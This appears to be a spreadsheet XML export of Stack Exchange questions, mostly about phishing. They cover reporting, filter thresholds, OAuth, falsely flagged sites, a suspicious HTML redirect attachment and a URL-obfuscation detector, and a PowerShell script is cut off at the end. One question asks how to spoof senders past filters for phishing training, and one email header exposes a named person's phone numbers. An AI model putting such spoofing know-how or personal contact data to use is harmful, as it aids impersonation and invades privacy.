  <si>
    <t>&lt;php&gt;&lt;forms&gt;&lt;captcha&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to report phishing in Teck Resources mail?</t>
  </si>
  <si>
    <t>&lt;p&gt;in a clear and well established way.I want a sequence of steps or actions to perform to notify phishing, dangerous or malicious emails.&lt;/p&gt;
 &lt;p&gt;Find in the documentation in confluence or through one of the Teck channels in teams, the way to report this type of emails for analysis and follow-up.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;procedure&gt;</t>
  </si>
  <si>
    <t>How do I create an SPF record to allow me to spoof senders?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am an IT Security professional (&lt;a href="https://security.stackexchange.com/users/6253/schroeder"&gt;my profile&lt;/a&gt;), so please understand that I have a legitimate reason for my question.&lt;/p&gt;
 &lt;p&gt;I want to have a phishing education program send realistic phishing emails, which means that I would like to spoof the senders. For instance, I would like to send from spoofed Facebook accounts. In order to make it past any potential spam or phishing filters, how can I go about doing that? Is there a way to configure SPF records to allow for that? &lt;/p&gt;
 &lt;p&gt;I have my own domain and I'm willing to jump through hoops to make this work.&lt;/p&gt;
 &lt;p&gt;My understanding of this side of email is weak, so any pointers that you might have will be helpful. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;spf&gt;</t>
  </si>
  <si>
    <t>What is the need for phishing threshold when then is a already a term called PCL(Phishing Confidence level)?</t>
  </si>
  <si>
    <t>&lt;p&gt;Here are reference to what I'm talking about.
 (&lt;a href="https://i.stack.imgur.com/6MhPR.png" rel="nofollow noreferrer"&gt;https://i.stack.imgur.com/6MhPR.png&lt;/a&gt;)(&lt;a href="https://i.stack.imgur.com/B9lbj.png" rel="nofollow noreferrer"&gt;https://i.stack.imgur.com/B9lbj.png&lt;/a&gt;)
 (&lt;a href="https://i.stack.imgur.com/4eoni.png" rel="nofollow noreferrer"&gt;https://i.stack.imgur.com/4eoni.png&lt;/a&gt;)&lt;/p&gt;
 &lt;p&gt;I need a clear explanation for the need of Phishing threshold ,when there already Phishing Confidence Level (PCL) is available for filtering level configuration.&lt;/p&gt;
 &lt;p&gt;We can see that in anti spam policies creation there is only SCL involved in the filtering process. This is the major root cause for my Query.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email-validation&gt;&lt;email-spam&gt;&lt;malware-detection&gt;&lt;phishing&gt;&lt;microsoft365-defender&gt;</t>
  </si>
  <si>
    <t>OAuth and phishing vulnerabilities, are they inexorably tied together?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've been doing a fair bit of work with OAuth recently, and I have to say that I really like it. I like the concept, and I like how it provides a low barrier-of-entry for your users to connect up the external data to your site (or for you to provide the data apis for consumption externally). Personally, I've always balked at sites that ask me to provide my login for another website to them directly. And OAuth "valet key for the web" approach solves this nicely.&lt;/p&gt;
 &lt;p&gt;The biggest problem I (and many others) see with it though, is the standard OAuth work-flow encourages the same type of behaviors that phishing attacks use to their advantage. If you train your user that it is normal behavior to be redirected to a site to provide login credentials, then it is easy for a phishing site to exploit that normal behavior but instead redirect to their clone site where they capture your username and password.&lt;/p&gt;
 &lt;p&gt;What, if anything, have you done (or seen done) to alleviate this problem?&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;Do you tell the users to go and login to the providing site manually, without automatic links or redirection? (but then this increases the barrier of entry)&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Do you attempt to educate your users, and if so, when and how? Any lengthy explanation of security that the user has to read also increases the barrier of entry.&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;What else?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;oauth&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Sending email through Gmail marked as phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm sending emails through C# code using Gmail's SMTP server, and on the receiving end Gmail reports:&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;This message may not have been sent by: &lt;em&gt;address&lt;/em&gt;@gmail.com Learn more Report phishing&lt;/strong&gt;.&lt;/p&gt;
 &lt;p&gt;The &lt;em&gt;from&lt;/em&gt; address I'm using is a gmail.com address.&lt;/p&gt;
 &lt;p&gt;This is the code I'm using:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;public class Email
 {
  public string FromAddress { get; set; }
  public string ToAddress { get; set; }
  public string Subject { get; set; }
  public string Content { get; set; }
  public string Password { private get; set; }
  public void Send()
  {
  using (var message = new MailMessage(FromAddress, ToAddress) { IsBodyHtml = true, Subject = Subject, Body = Content })
  {
  GetSmptClient(FromAddress, Password).Send(message);
  }
  }
  static SmtpClient GetSmptClient(string userName, string password)
  {
  return new SmtpClient
  {
  Host = "smtp.gmail.com",
  Port = 587,
  EnableSsl = true,
  DeliveryMethod = SmtpDeliveryMethod.Network,
  UseDefaultCredentials = false,
  Credentials = new NetworkCredential(userName, password)
  };
  }
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Any ideas what I'm doing wrong?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;c#&gt;&lt;email&gt;&lt;gmail&gt;</t>
  </si>
  <si>
    <t>Kaspersky marks an URL on my site as phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've recently finished a website for a client which is using some ajax-calls. At some point a local virus scanner Kaspersky is saying the url &lt;code&gt;www.domain.com/ajax/ajax.php?Request=request-to-perform&lt;/code&gt; is a phishing URL. Obviously it's not.&lt;/p&gt;
 &lt;p&gt;Any of you guys ran in to this before? Can I set some headers to tell Kaspersky to relax? There doesn't seem to be much helpful information around.&lt;/p&gt;
 &lt;p&gt;Thanks in advance for your reply.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;http-headers&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Google Email / Heroku Hosting / Email Delivery Failure</t>
  </si>
  <si>
    <t>&lt;p&gt;I hope someone out there can tell me if I have something configured wrong or if this is a Heroku bug.&lt;/p&gt;
 &lt;p&gt;When I email someone at a University, the email somehow comes in with a herokuapp extension in the email address that does not really exist. Then when people try to reply, it bounces back because that email doesnt exist. An example of this is below. &lt;/p&gt;
 &lt;p&gt;I'm hoping I have a CName configured wrong or something. I am not using A records, all CName records. My first CNAME record is an @ record with the value of challengage.herokuapp.com.&lt;/p&gt;
 &lt;p&gt;Let me know if you can help! Much appreciated.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;---------- Forwarded message ----------
  From: David DiMaggio 
 Date: Monday, July 15, 2013
 Subject: FW: Challengage - Work Team Simulation product for interviewing evaluations
 To: "Paul Klopfer (paul@challengage.com)" &amp;lt;paul@challengage.com&amp;gt;
 Paul,
  This is the message below that I receive when I reply to your emails that come from this address: paul@challengage.herokuapp.com
 David C. DiMaggio
 Program Manager
 CASE Co-op Program
 Syracuse University
 Center for Science &amp;amp; Technology
 Room 1-232
 Syracuse, NY 13244-4100
 315-443-5018; Fax 315-443-4745
 Cell: 315-436-1124
 http://case.syr.edu/coops/index.php
 -----Original Message-----
 From: Mail Delivery Subsystem [mailto:MAILER-DAEMON@smtp2.syr.edu]
 Sent: Monday, July 15, 2013 2:08 PM
 To: David DiMaggio
 Subject: Undeliverable: FW: Challengage - Work Team Simulation product for interviewing evaluations
 Delivery has failed to these recipients or groups:
 paul@challengage.herokuapp.com
 The server has tried to deliver this message, without success, and has stopped trying. Please try sending this message again. If the problem continues, contact your helpdesk.
 The following organization rejected your message: challengage.herokuapp.com.
 Diagnostic information for administrators:
 Generating server: smtp2.syr.edu
 paul@challengage.herokuapp.com
 challengage.herokuapp.com #&amp;lt;challengage.herokuapp.com #4.4.7&amp;gt; #SMTP#
 Original message headers:
 Return-Path: &amp;lt;ddimaggi@syr.edu&amp;gt;
 Received: from suex10-hub-01.ad.syr.edu ([128.230.108.124])
  by smtp2.syr.edu (8.14.5/8.14.5) with ESMTP id r68GaQdR008193
  (version=TLSv1/SSLv3 cipher=AES128-SHA bits=128 verify=FAIL);
  Mon, 8 Jul 2013 12:36:26 -0400
 Received: from SUEX10-MBX-09.ad.syr.edu ([128.230.108.192]) by
  suex10-hub-01.ad.syr.edu ([128.230.108.124]) with mapi id 14.03.0123.003;
  Mon, 8 Jul 2013 12:36:26 -0400
 From: David DiMaggio &amp;lt;ddimaggi@syr.edu&amp;gt;
 To: "'Paul Klopfer'" &amp;lt;paul@challengage.herokuapp.com&amp;gt;
 CC: "'Hendrickson, Cindy (GE Corporate)'" &amp;lt;lucinda.hendrickson@ge.com&amp;gt;
 Subject: RE: FW: Challengage - Work Team Simulation product for interviewing
  evaluations
 Thread-Topic: FW: Challengage - Work Team Simulation product for
  interviewing evaluations
 Thread-Index: AQHOcuA7MvWUIninI0ObOEkuTugrYJlSpdKAgAhmsmA=
 Date: Mon, 8 Jul 2013 16:36:25 +0000
 Message-ID: &amp;lt;832C225B54BD58489EF60E1B2B7D1165264525@SUEX10-mbx-09.ad.syr.edu&amp;gt;
 References: &amp;lt;832C225B54BD58489EF60E1B2B7D11652618DF@SUEX10-mbx-09.ad.syr.edu&amp;gt;
  &amp;lt;832C225B54BD58489EF60E1B2B7D1165261BF0@SUEX10-mbx-09.ad.syr.edu&amp;gt;
  &amp;lt;CAHGmi1POvrk1F954ViRL5xEHKDqN1sqFvqk6XWMH=U12VjO3PA@mail.gmail.com&amp;gt;
  &amp;lt;CAHGmi1Ofb13g7MenaT4Q69VJ=wU8fJcMdDpWih9P4tMC_4nsJA@mail.gmail.com&amp;gt;
 In-Reply-To: &amp;lt;CAHGmi1Ofb13g7MenaT4Q69VJ=wU8fJcMdDpWih9P4tMC_4nsJA@mail.gmail.com&amp;gt;
 Accept-Language: en-US
 Content-Language: en-US
 X-MS-Has-Attach:
 X-MS-TNEF-Correlator:
 x-originating-ip: [128.230.32.54]
 Content-Type: text/plain
 MIME-Version: 1.0
 X-Proofpoint-Virus-Version: vendor=fsecure engine=2.50.10432:5.10.8794,1.0.431,0.0.0000
  definitions=2013-07-08_02:2013-07-08,2013-07-08,1970-01-01 signatures=0
 X-Proofpoint-Spam-Details: rule=notspam policy=default score=0 spamscore=0 suspectscore=0 phishscore=0
  adultscore=0 bulkscore=0 classifier=spam adjust=0 reason=mlx scancount=1
  engine=7.0.1-1305240000 definitions=main-1307080139
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;heroku&gt;&lt;gmail&gt;&lt;mail-server&gt;</t>
  </si>
  <si>
    <t>A good method to detect any(not just malicious) intentionally obfuscated urls in text</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a website on which anyone can register and post public content. However certain malicious users go on the site and post links that have to be legally taken down.
 So all new users have to be approved before they can post URLs.
 However, they attempt to avoid URL detection, like posting URLs similar to these:&lt;/p&gt;
 &lt;p&gt;h tt.pp//example(dot)com&lt;/p&gt;
 &lt;p&gt;Mainly URL shorteners and image hosting sites are the problems.&lt;/p&gt;
 &lt;p&gt;I would like to use a one-time solution.&lt;/p&gt;
 &lt;p&gt;Our URL detection method is continuously advanced to counter their obfuscation attempts. It uses regex and replaces techniques and blacklisting of known sites that the malicious users can/have used, but there are too many to blacklist them all.&lt;/p&gt;
 &lt;p&gt;I have looked into AI solutions, but I can't find one that seems good for my problem, as most AI's are dedicated to detecting phishing sites, instead of obfuscated URLs.
 Another option is to train our own AI, but this would take us more time(we have not done this before) to workout then continuously advance the URL detector as we do now.&lt;/p&gt;
 &lt;p&gt;As a last resort, we may try to train an AI ourselves, suggestions where to find suitable data for this, are also appreciated.&lt;/p&gt;
 &lt;p&gt;We use C#, but any language is an option, we will integrate it one way or another.&lt;/p&gt;
 &lt;pre class="lang-cs prettyprint-override"&gt;&lt;code&gt;public static class SecurityHelper
 {
  private static string UrlCheckerReplaceRegex;
  private static string UrlCheckerBadStringsRegex;
  private static string UrlCheckerBadStringsSpaceRegex;
  static SecurityHelper()
  {
  var repalceStrings = new string[] { @"\s", "-", @"\[", @"\]", @"\(", @"\)", @"\{", @"\}", "d+o*t+", @"/", @"\\", @"\|", "d*o+t+", "d+o+t+", @"\." };
  Array.ForEach(repalceStrings, (str) =&amp;gt; str = '(' + str + ')');
  UrlCheckerReplaceRegex = string.Join("|", repalceStrings);
  var badStrings = new string[]
  {
  @"u\.*to\.+", @"goo\.+gl"
  };
  Array.ForEach(badStrings, (str) =&amp;gt; str = '(' + str + ')');
  UrlCheckerBadStringsRegex = string.Join("|", badStrings);
  var badStringsSpace = new string[]
  {
  "ww+", "h+t+p+", "imgur", "sh4re", "ibb", @"bitly", @"tinyurl", @"cuttly", @"demopolrme", @"doiopcom",
  @"tinycc", @"[0-9]ly", @"shrunkencom", @"[0-9]gp", @"pasia", @"gasia", @"gggg", @"bitdo", @"isgd", @"vgd",
  @"tnysh", @"tinypic", @"0rztw", @"chilpit"
  };
  Array.ForEach(badStringsSpace, (str) =&amp;gt; str = '(' + str + ')');
  UrlCheckerBadStringsSpaceRegex = string.Join("|", badStringsSpace);
  }
  public static bool ContainsPossibleUrls(string text)
  {
  var modifiedText = text.ToLower();
  modifiedText = Regex.Replace(modifiedText, string.Join("|", UrlCheckerReplaceRegex), ".");
  // replace all spaces and other characters to get the unobfuscated text and try and find a blacklisted url, here they are replaced by a '.', because some blacklisted urls are too broad and we do not want to accidently block a non malicious input (www\u.to\, 'u to' can be matched if someone writes 'u too' as part of a message, so we look for "u\.*to\.+")
  if (Regex.Match(modifiedText, UrlCheckerBadStringsRegex, RegexOptions.IgnoreCase).Success)
  {
  return true;
  }
  var modifiedTextSpace = text.ToLower();
  modifiedTextSpace = Regex.Replace(modifiedTextSpace, string.Join("|", UrlCheckerReplaceRegex), "");
  // remove all spaces and other characters to get the unobfuscated text and try and find a blacklisted url
  if (Regex.Match(modifiedTextSpace, UrlCheckerBadStringsSpaceRegex, RegexOptions.IgnoreCase).Success)
  {
  return true;
  }
  if (FindUrls(text).Count &amp;gt; 0)
  {
  return true;
  }
  return false;
  }
  public static List&amp;lt;string&amp;gt; FindUrls(string text)
  {
  var urls = new List&amp;lt;string&amp;gt;();
  if (string.IsNullOrWhiteSpace(text))
  {
  return urls;
  }
  MatchCollection matches = Regex.Matches(text, @"(http|https):\/\/([\w_-]+(?:(?:\.[\w_-]+)+))([\w.,@?^=%&amp;amp;:\/~+#-]*[\w@?^=%&amp;amp;\/~+#-])?"); // find all urls
  foreach (Match match in matches)
  {
  foreach (Capture capture in match.Captures)
  {
  urls.Add(capture.Value);
  }
  }
  return urls.Distinct().ToList();
  }
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;If a human mind can identify the pattern of the URL, then an AI must be able to as well.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;c#&gt;&lt;url&gt;&lt;artificial-intelligence&gt;&lt;detection&gt;</t>
  </si>
  <si>
    <t>What is the best way to let Google know the difference between a Production, Development, and Staging environment?</t>
  </si>
  <si>
    <t>&lt;p&gt;We have three domain names with pretty close to duplicate content (Magento sites). Let's call them &lt;code&gt;production.com&lt;/code&gt;, &lt;code&gt;development.com&lt;/code&gt; and &lt;code&gt;staging.com&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;I have robots no-index on &lt;code&gt;development.com&lt;/code&gt; and &lt;code&gt;staging.com&lt;/code&gt;. I also have htpasswds enabled. A Google search of these domains shows that they haven't been indexed. However, I'm starting to get phishing warnings from Chrome when I log in to the back end of the software. &lt;/p&gt;
 &lt;p&gt;I need to stop this as soon as possible. If the warnings spread to the front end we're looking at pretty serious ramifications. &lt;/p&gt;
 &lt;p&gt;What is the best course of action?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;magento&gt;&lt;google-chrome&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Received HtML File In Mail Click Mistakenly</t>
  </si>
  <si>
    <t>&lt;p&gt;I Received an Malicious HTML Code in my Email Account and I Mistakenly Click On That ,Please Help Me Identify the Code and What Should I Do Now,Is there anything To be afraid Of
 here the HTML FILE CODE&lt;/p&gt;
 &lt;p&gt;&lt;div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false"&gt;
 &lt;div class="snippet-code"&gt;
 &lt;pre class="snippet-code-html lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;HTML&amp;gt;
 &amp;lt;HEAD&amp;gt;
 &amp;lt;TITLE&amp;gt;Moved Temporarily&amp;lt;/TITLE&amp;gt;
 &amp;lt;/HEAD&amp;gt;
 &amp;lt;BODY BGCOLOR="#FFFFFF" TEXT="#000000"&amp;gt;
 &amp;lt;H1&amp;gt;Moved Temporarily&amp;lt;/H1&amp;gt;
 The document has moved &amp;lt;A HREF="https://accounts.google.com/ServiceLogin?service=mail&amp;amp;amp;passive=true&amp;amp;amp;rm=false&amp;amp;amp;continue=https://mail.google.com/mail/?ui%3D2%26ik%3D36348af3d4%26attid%3D0.1%26permmsgid%3Dmsg-f:1746041131427831748%26th%3D183b2f2879fa1fc4%26view%3Datt%26disp%3Dinline%26ser%3D1&amp;amp;amp;scc=1&amp;amp;amp;ltmpl=default&amp;amp;amp;ltmplcache=2&amp;amp;amp;emr=1&amp;amp;amp;osid=1#"&amp;gt;here&amp;lt;/A&amp;gt;.
 &amp;lt;/BODY&amp;gt;
 &amp;lt;/HTML&amp;gt;&lt;/code&gt;&lt;/pre&gt;
 &lt;/div&gt;
 &lt;/div&gt;
 &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;html&gt;&lt;account&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>how to extract data from json</t>
  </si>
  <si>
    <t>&lt;p&gt;i want to extract particular values from the json object mentioned below.but it is giving some error&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; &amp;gt;&amp;gt;&amp;gt; print json
 {
  "response_code": 1,
  "verbose_msg": "Scan finished, scan information embedded in this object",
  "resource": "99017f6eebbac24f351415dd410d522d",
  "scan_id": "52d3df0ed60c46f336c131bf2ca454f73bafdc4b04dfa2aea80746f5ba9e6d1c-1273894724",
  "md5": "99017f6eebbac24f351415dd410d522d",
  "sha1": "4d1740485713a2ab3a4f5822a01f645fe8387f92",
  "sha256": "52d3df0ed60c46f336c131bf2ca454f73bafdc4b04dfa2aea80746f5ba9e6d1c",
  "scan_date": "2010-05-15 03:38:44",
  "positives": 40,
  "total": 40,
  "scans": {"nProtect": {"detected": true, "version": "2010-05-14.01", "result": "Trojan.Generic.3611249", "update": "20100514"},
  "CAT-QuickHeal": {"detected": true, "version": "10.00", "result": "Trojan.VB.acgy", "update": "20100514"},
  "McAfee": {"detected": true, "version": "5.400.0.1158", "result": "Generic.dx!rkx", "update": "20100515"},
  "TheHacker": {"detected": true, "version": "6.5.2.0.280", "result": "Trojan/VB.gen", "update": "20100514"},
  "VirusBuster": {"detected": true, "version": "5.0.27.0", "result": "Trojan.VB.JFDE", "update": "20100514"},
  "NOD32": {"detected": true, "version": "5115", "result": "a variant of Win32/Qhost.NTY", "update": "20100514"},
  "F-Prot": {"detected": false, "version": "4.5.1.85", "result": null, "update": "20100514"},
  "Symantec": {"detected": true, "version": "20101.1.0.89", "result": 
  "permalink": "https://www.virustotal.com/file/52d3df0ed60c46f336c131bf2ca454f73bafdc4b04dfa2aea80746f5ba9e6d1c/analysis/1273894724/"
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;and so on....
  }&lt;/p&gt;
 &lt;p&gt;to achieve above i have written following code:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; data = json.loads(json_post)
  response_dict = simplejson.loads(json_post)
  logging.info(response_dict)
  if response_dict['response_code'] == 0:
  self.response.out.write("11")
  elif response_dict['response_code'] == -2:
  self.response.out.write("API Request Rate Limit Exceeded&amp;lt;br/&amp;gt;")
  elif response_dict['response_code'] == -1:
  self.response.out.write("API Key provided is wrong&amp;lt;br/&amp;gt;")
  elif response_dict['response_code'] == 1:
  link.req_timestamp = response_dict['scans'][0]
  Fire_fox=response_dict.get("scans")[1].get("Firefox")
  if Fire_fox:
  link.firefox = data['scans'][1]['Firefox']
  Trend_Micro=response_dict.get("scans")[1].get("TrendMicro")
  if Trend_Micro:
  link.trendmicro = data['scans'][1]['TrendMicro']
  Phishtank=response_dict.get("scans")[1].get("Phishtank")
  if Phishtank:
  link.phishtank = data['scans'][1]['Phishtank']
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;the error is KeyError: 'scans'.. plz tell me where i am going wrong&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;json&gt;&lt;google-app-engine&gt;</t>
  </si>
  <si>
    <t>How to make my website not dangerous when doing a phishing awareness campaigns?</t>
  </si>
  <si>
    <t>&lt;p&gt;So I have a website that send phishing emails for employers and I get the results for this campaign (for example how many employees click on the link, etc)
 While testing my website on my personal emails the website became dangerous.
 What should I do ?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web&gt;&lt;url&gt;&lt;phishing&gt;&lt;gophish&gt;</t>
  </si>
  <si>
    <t>How to get FB login API_KEY and secret for business page?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have created my ecommerce website's business page from my personal account. To enable FB login to my website, I need the API_KEY and SECRET. From the business page, I cannot find how to create it but can create one from my personal account.&lt;/p&gt;
 &lt;p&gt;How do I create the keys from my business page?&lt;/p&gt;
 &lt;p&gt;If I create it from my personal account, will that be the proper way to do it? (Somewhere, it sounds like similar to phishing -- how will FB associate my website to keys created from my personal account?) &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;facebook&gt;&lt;facebook-login&gt;</t>
  </si>
  <si>
    <t>What e-mail address ("From" vs. "Mail From") is considered by my block list?</t>
  </si>
  <si>
    <t>&lt;p&gt;We are getting a lost of spam /phishing e-mails where the [From] is showing our own domain (e.g. "john@foobar.com"), but the [Mail From] (return-path) in the e-mail header is showing "root@foo-574401.hostbar.com".&lt;/p&gt;
 &lt;p&gt;Question is now, which e-mail address is actually considered by the Exchange Online block list and could someone point me to the corresponding documentation of Microsoft? &lt;/p&gt;
 &lt;p&gt;In case the block-list does not consider the [Mail From] we need to setup an transport-rule to address those kind of e-mails? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;exchange-server&gt;&lt;email-spam&gt;</t>
  </si>
  <si>
    <t>What is the purpose of a CORS whitelist?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a GraphQL API that has CORS enabled and I have an array of valid origins, urls where client side requests can make requests to the API.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;app.use(cors({
  origin: ["https://example.com"],
  optionsSuccessStatus: 200
 }))
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;What is the real purpose of blocking origins? Because this is an API any server can talk directly to this API. This really only prevents / limits clients from accessing the API.&lt;/p&gt;
 &lt;p&gt;If it's important at all to actually have a real whitelist, my question is should I allow &lt;code&gt;http&lt;/code&gt; protocols, because &lt;code&gt;http&lt;/code&gt; protocols can be easily spoofed / phished.&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;What's the main downside or security venerability for allowing any origin (&lt;code&gt;*&lt;/code&gt;) to a CORS enabled API?&lt;/li&gt;
 &lt;li&gt;Should a CORS whitelist domain ever support &lt;code&gt;http&lt;/code&gt; origins?&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;node.js&gt;&lt;http&gt;&lt;https&gt;&lt;cors&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Google thinks my portfolio project is a phishing scam</t>
  </si>
  <si>
    <t>&lt;p&gt;Basically I made a Netflix clone as a portfolio project, there is a banner along the bottom that shows it's a project built by me but when visiting the page via google chrome I get a red screen with a warning saying this:
 &lt;a href="https://i.stack.imgur.com/6XEEf.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/6XEEf.png" alt="Google phishing scam warning" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Once on the page it says I may be using deceptive ads.&lt;/p&gt;
 &lt;p&gt;Any ideas how I can remedy this? Don't think employers will appreciate it lol.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;google-chrome&gt;&lt;frontend&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>OAuth client id and guessing</t>
  </si>
  <si>
    <t>&lt;p&gt;OAuth manual &lt;a href="https://www.oauth.com/oauth2-servers/client-registration/client-id-secret/" rel="nofollow noreferrer"&gt;https://www.oauth.com/oauth2-servers/client-registration/client-id-secret/&lt;/a&gt; says that&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;The client_id is a public identifier for apps. Even though it‚Äôs
 public, it‚Äôs best that it isn‚Äôt guessable by third parties, so many
 implementations use something like a 32-character hex string. It must
 also be unique across all clients that the authorization server
 handles. If the client ID is guessable, it makes it slightly easier to
 craft phishing attacks against arbitrary applications.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Why should I care about client-id guessing? It is public. Anyone can read it. Why should I make it hex string?&lt;/p&gt;
 &lt;p&gt;Can I have own oauth provider that has only few client ids, e.g. app1, app2, app3. I will use PKCE and server redirect to well known urls only.&lt;/p&gt;
 &lt;p&gt;How that is vulnerable to phishing having such short client-id values?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;oauth&gt;&lt;clientid&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to test if a URL is a phishing in command line using Google Safe Browsing?</t>
  </si>
  <si>
    <t>&lt;p&gt;In Google Safe Browsing, there are two ways to test if a URL is a phishing URL: &lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;lookup-based and &lt;/li&gt;
 &lt;li&gt;hash-based.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;In this question, I focus on the hash-based solution, better for privacy, as used by browsers such as Firefox.&lt;/p&gt;
 &lt;p&gt;For this, the browser downloads a hash database &lt;code&gt;goog-phish-shavar&lt;/code&gt; which is saved as &lt;code&gt;~/.cache/mozilla/firefox/&amp;lt;profile_folder&amp;gt;/safebrowsing/goog-phish-shavar.sbstore&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;Now, I want to test a URL in command line as follows&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;test-safebrowsing-url goog-phish-shavar.sbstore http://example-phishing.com 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;How to do this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;safe-browsing&gt;</t>
  </si>
  <si>
    <t>Powershell: Output an array item to Rich textbox</t>
  </si>
  <si>
    <t>&lt;p&gt;I am attempting to write a version of Cards Against IT and have a question. &lt;/p&gt;
 &lt;p&gt;I have an array from which I am using &lt;code&gt;Get-Random&lt;/code&gt;. My first thought was to have the white and czar cards both on one script. but I would need to use items= list of cards then use the for-each item in items function. If I had both types of cards in a list I would assume the script would not work with 2 "list" cmdlets. Can I rename these to "cards" and "czar" &lt;/p&gt;
 &lt;p&gt;this an example of the white cards in a array I believe.&lt;/p&gt;
 &lt;p&gt;also when I run this script instead of only one item in the list getting returned all of them do. How could I fix this? Any direction is always appreciated.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;#Generated Form Function
 function GenerateForm {
 ########################################################################
 # Generated On: 8/29/2016 1:53 PM
 # Generated By: christnerw
 ########################################################################
 #region Import the Assemblies
 [reflection.assembly]::loadwithpartialname("System.Drawing") | Out-Null
 [reflection.assembly]::loadwithpartialname("System.Windows.Forms") | Out- Null
 #endregion
 #region Generated Form Objects
 $form1 = New-Object System.Windows.Forms.Form
 $richTextBox9 = New-Object System.Windows.Forms.RichTextBox
 $card = New-Object System.Windows.Forms.Button
 $richTextBox8 = New-Object System.Windows.Forms.RichTextBox
 $richTextBox7 = New-Object System.Windows.Forms.RichTextBox
 $richTextBox6 = New-Object System.Windows.Forms.RichTextBox
 $richTextBox5 = New-Object System.Windows.Forms.RichTextBox
 $richTextBox4 = New-Object System.Windows.Forms.RichTextBox
 $richTextBox3 = New-Object System.Windows.Forms.RichTextBox
 $Czar = New-Object System.Windows.Forms.Button
 $richTextBox2 = New-Object System.Windows.Forms.RichTextBox
 $richTextBox1 = New-Object System.Windows.Forms.RichTextBox
 $InitialFormWindowState = New-Object System.Windows.Forms.FormWindowState
 #endregion Generated Form Objects
 #----------------------------------------------
 #Generated Event Script Blocks
 #----------------------------------------------
 #Provide Custom Code for events specified in PrimalForms.
 $handler_richTextBox7_TextChanged= 
 {
 #TODO: Place custom script here
 }
 $handler_form1_Load= 
 {
 #TODO: Place custom script here
 }
 $card_OnClick= {
 $richTextBox2.Text = $white
 }
 $card_OnClick= {
 $richTextBox3.Text = $white
 }
 $card_OnClick= {
 $richTextBox4.Text = $white
 }
 $card_OnClick= {
 $richTextBox5.Text = $white
 }
 $card_OnClick= {
 $richTextBox6.Text = $white
 }
 $card_OnClick= {
 $richTextBox7.Text = $white
 }
 $card_OnClick= {
 $richTextBox8.Text = $white
 }
 $card_OnClick= {
 $richTextBox9.Text = $white |Out-String
 }
 {
 }
 $handler_richTextBox5_TextChanged= 
 {
 #TODO: Place custom script here
 }
 $handler_Czar_Click= {
 $richTextBox1.Text = $czar |Out-String
 }
 {
 }
 $OnLoadForm_StateCorrection=
 {#Correct the initial state of the form to prevent the .Net maximized form issue
 $form1.WindowState = $InitialFormWindowState
 }
 #----------------------------------------------
 #region Generated Form Code
 $form1.BackColor = [System.Drawing.Color]::FromArgb(255,139,0,0)
 $System_Drawing_Size = New-Object System.Drawing.Size
 $System_Drawing_Size.Height = 808
 $System_Drawing_Size.Width = 1306
 $form1.ClientSize = $System_Drawing_Size
 $form1.DataBindings.DefaultDataSourceUpdateMode = 0
 $form1.Font = New-Object System.Drawing.Font("Microsoft Sans Serif",12,1,3,1)
